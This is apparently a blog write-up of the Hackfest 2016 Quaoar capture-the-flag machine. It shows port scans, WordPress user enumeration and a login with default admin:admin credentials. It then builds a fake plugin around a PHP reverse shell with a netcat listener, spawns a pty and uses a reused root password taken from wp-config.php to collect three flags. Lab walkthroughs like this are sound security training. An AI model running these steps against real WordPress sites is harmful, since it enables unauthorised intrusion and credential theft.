Another week, another CTF under my belt. Been doing a lot of CTF games the past months. This time I took some time off my schedule to play with the hackfest2016: Quaoar game. The difficulty level on this one is pretty low, which suited me fine this time around. It’s nice to have something to keep oneself occupied that doesn’t require much braining. Anyway, lets cut to the chase!
Welcome to Quaoar
This is a vulnerable machine i created for the Hackfest 2016 CTF http://hackfest.ca/
Difficulty : Very Easy
Here are the tools you can research to help you to own this machine. nmap dirb / dirbuster / BurpSmartBuster > nikto wpscan hydra Your Brain Coffee Google 🙂
Goals: This machine is intended to be doable by someone who is interested in learning computer security There are 3 flags on this machine 1. Get a shell 2. Get root access 3. There is a post exploitation flag on the box
Feedback: This is my first vulnerable machine, please give me feedback on how to improve ! @ViperBlackSkull on Twitter firstname.lastname@example.org Special Thanks to madmantm for testing
You may have issues with VMware_
This game did not require hunting for its IP address since it show it already at the login prompt. Cutting directly to service discovery:
|sudo nmap -p1-65535 -A -T4 -sS 192.168.110.14|
Service scan revealed some interesting services:
In addition, the scan stumbled over the following:
|ssh||OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0|
|http||folder Hackers, robots.txt|
|pop3||dovecot pop3d supporting SASL TOP PIPELINING UIDL RESP-CODES STLS CAPA|
|imap||post-login ID OK IMAP4rev1 LITERAL+ listed STARTTLS|
This game seem propped with all sorts of services. They may be a complete hoax, such things happen. At this moment I do not know if these services will come in handy later on.
First flag: web
Most games wants you to investigate the web part first. Visiting it in Firefox didn’t reveal anything interesting, neither in HTML source or the images shown. Nmap did uncover a robots.txt file and I began looking closer into it:
|Disallowed||Hackers||Does not exist|
Not much to go by here, except WordPress. Trying dirb to push my luck:
$ dirb http://192.168.110.14 /usr/share/dirb/wordlists/big.txt -o dirb_scan.txt -w
This certainly took a while. After a couple of minutes I just killed dirb and looked at the results. There seems to be a CMS (Lepton CMS) lurking in the shadows on this target. Toyed with the paths found and it appeared the CMS does absolutely nothing. Decided to skip it and focus on WordPress instead.
Looking at WordPress installations is always fun. Time to bring out WpScan, adding in user enumeration for good measure:
sudo wpscan --url http://192.168.110.14/wordpress/ --enumerate u
|/readme.html||WordPress version 3.9.14|
|/wp-content/uploads/||Upload directory has directory listing enabled|
Also found these users:
Seems like a normal WordPress site set up in a hurry. Perhaps whoever responsible set it up using default credentials (admin:admin)? It’s worth a try!
Fascinating results! It is time to get shell access. Now, there are a couple of routes to do this. I often land on creating a fake plugin.
As mentioned, I am going to create a fake plugin. First I bring out my trusty Shelly shell (you path may vary):
$ cp /usr/share/webshells/php/php-reverse-shell.php shelly.php
Then add a nice plugin wrapper around it:
<?php /* Plugin Name: Shelly Plugin URI: http://localhost Description: Bla Bla Bla Author: Pingmoose Version: 1.0.1 Author URI: http://localhost */ COPY CONTENTS OF shelly.php HERE ?>
Prepared Shelly with my IP address and listening port, then finally zipping the entire thing down:
$ zip shelly-plugin.zip shelly.php
Then installing the plugin, without activating it:
Setting up listener:
$ nc -lvp 4444
Activating the shell, visiting 192.168.110.14/wordpress/wp-content/plugins/shelly-plugin/shelly.php. Connection successfully picked up by listener and thus got shell:
Current shell is somewhat limited, spawning a new shell using a Python gem:
$ whoami $ whereis python $ python -c 'import pty; pty.spawn("/bin/bash")'
Looked around in the /home folder and found a flag hiding in the wpadmin folder (flag.txt). First flag: 2bafe61f03117ac66a73c3c514de796e.
Second flag: chasing ROOT
Moving on trying to get ROOT access. First I tried to find if there were any scripts laying around which I could abuse:
$ cd / $ find / -perm -4000 -user root 2> /dev/null
Nothing of interest found. Given that the WordPress installation looks like been set up in a hurry, maybe passwords were reused as well? Best place is to look at /var/www/wordpress/wp-config.php first:
Hit gold. I think the hint couldn’t be any clearer. Password is literally rootpassword!
Navigated over to /root and found the flag: 8e3f9ec016e3598c5eec11fd3d73f6fb. According to the introduction text for this game there should be third flag hidden somewhere.
Third flag: dancing like Indiana Jones
Time to do some braining. I am ROOT, thus I can do everything. Got a gut feeling the last flag is tucked away in plain text, perhaps in a comment somewhere. This step I did manually by starting looking in /etc. Found what I was looking for in /etc/cron.d/php5:
The third flag: d46795f84148fd338603d0d6a9dbf8de